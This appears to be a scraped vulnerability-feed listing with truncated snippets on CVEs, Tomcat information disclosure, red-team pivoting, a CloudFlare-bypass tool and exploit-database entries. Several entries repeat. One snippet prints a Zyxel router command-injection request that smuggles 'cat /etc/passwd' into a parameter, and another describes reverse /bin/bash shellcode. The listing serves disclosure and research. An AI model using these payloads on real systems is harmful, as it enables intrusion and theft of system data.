Wallarm Teams up with NGINX Plus to Provide Advanced Security

Wallarm is excited to be a pioneer security vendor in NGINX Certified Module program and provide trusted and verified security functionality to NGINX Plus customers. “We are pleased to announce that Wallarm is now part of the NGINX Plus Certified Module program with the Wallarm Next Generation WA...

Microsoft Windows PowerShell Security Feature Bypass Vulnerability (CVE-2017-0007)

Over the past few months, I have had the pleasure to work side-by-side with Matt Graeber @mattifestation and Casey Smith @subtee in their previous job roles, researching Device Guard user mode code integrity UMCI bypasses. If you aren't familiar with Device Guard, you can read more about it here:...

Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability

Exploit for hardware platform in category remote exploits Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh...

Zyxel / EMG2926 Command Injection

Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10124 AppleWebKit/537.36 KHTML, like Geck...

Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)

/ ; File name: reversebash.nasm ; Author: Jasmin Landry @JR0ch17 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 ; To change ; Shellcode length: 110 bytes ; Tested on Ubuntu 12.04.5 32-bit x86 ; Assemble reversebash.nasm file: nasm -f elf32 -o...

Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)

Linux/x86 - Reverse /bin/bash Shellcode 110 bytes. Shellcode exploit for Linx86 platform / ; File name: reversebash.nasm ; Author: Jasmin Landry @JR0ch17 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 ; To change ; Shellcode length: 110 bytes...

Apache Tomcat Reverse Proxy Information Disclosure Vulnerability (Mar 2017) - Linux

Apache Tomcat is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:apache:tomcat"...

Apache Tomcat Reverse Proxy Information Disclosure Vulnerability (Mar 2017) - Windows

Apache Tomcat is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:apache:tomcat"...

A Red Teamer’s guide to pivoting

A Red Teamer’s guide to pivoting A Red Teamer's guide to pivoting Penetration testers often traverse logical network boundaries in order to gain access to client’s critical infrastracture. Common scenarios include developing the attack into the internal network after successful perimeter breach o...

CVE-2017-6971

AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862...

CVE-2017-6971

AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862...

CVE-2017-6971

AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862...

HatCloud - Tool for identify real IP of CloudFlare (Bypass CloudFlare)

HatCloud build in Ruby. It makes bypass in CloudFlare for discover real IP. This can be useful if you need test your server and website. Testing your protection against Ddos Denial of Service or Dos. CloudFlare is services and distributed domain name server services, sitting between the visitor a...

Apache Tomcat information disclosure Vulnerability, CVE-2016-8747-a vulnerability warning-the black bar safety net

Release time: 2017-3-13 20:05:14 GMT Importance: medium Affected versions: Apache Tomcat 9.0.0. m11 to 9.0.0. m15 Apache Tomcat 8.5.7 to 8.5.9 Description: For a more extensive use of ByteBuffer in the refactoring introduced a regression that could cause the information on the same connection...

CVE-2016-8747

An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request...

Information disclosure

An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request...

CVE-2016-8747

An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request...

CVE-2016-8747

The CVE-2016-8747 issue affects Apache Tomcat 8.5.7–8.5.9 and 9.0.0.M11–9.0.0.M15 in reverse-proxy configurations, where Http11InputBuffer.java can let a remote attacker read data belonging to a different request. The underlying problem is an information-disclosure vulnerability in the Tomcat rev...

Information Disclosure

tomcat-coyote is vulnerable to information disclosure. The vulnerability is caused due to a regression introduced by a refactoring to widen the use of bytebuffer. Due to the flaw, when running behind a reverse proxy, the information leaks between requests on the same connection. All HTTP connecto...

GitLab: Gitlab.com is vulnerable to reverse tabnabbing via AsciiDoc links. (#3)

Dear GitLab bug bounty team, Summary --- Gitlab.com is vulnerable to reverse tabnabbing in AsciiDoc files. Why does this vulnerability exist? --- In AsciiDoc the following http://example.comReverse Tabnabbing^ is equivalent to Reverse Tabnabbing. How can this exploited? --- Same scenario as...